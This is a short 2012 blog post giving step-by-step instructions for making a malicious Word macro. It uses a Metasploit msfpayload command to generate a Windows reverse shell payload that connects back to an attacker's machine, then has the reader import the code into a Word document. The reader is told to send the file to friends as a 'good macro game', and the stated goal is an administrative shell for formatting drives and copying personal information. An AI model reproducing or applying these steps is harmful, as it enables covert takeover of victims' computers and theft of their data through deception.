Tuesday, May 1, 2012

Create Undectable Macro Virus for Windows OS



We use Metasploit Linux version to create virus or handle all remote connections.
Download Now 

Action: When any user runs the word file, we get command prompt with full administrative
rights to format any drive, copy personal information.
Requirement:
1. Linux Machine (To generate virus and to listen connections)
2. Windows Machine (To embedd VBA code into word file)
Type following commands at Linux shell prompt:
# cd Desktop
# cd framework32
# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.8 LPORT=4444 V>/root/vbvirus.txt

LHOST=192.168.1.8 is our linux machine ip address.
LPORT=4444 is a local port for communication.
Just copy vbvirus.txt file in pen drive and goto another windows system where office 2003
installed. after we open MS WORD 2003 and select tools options select Macro select
Visual basic editor
After select File menu Import file select Vbvirus.txt
Save the file and exit and send to ur friends. Say this is good macro game.

0 comments:

Post a Comment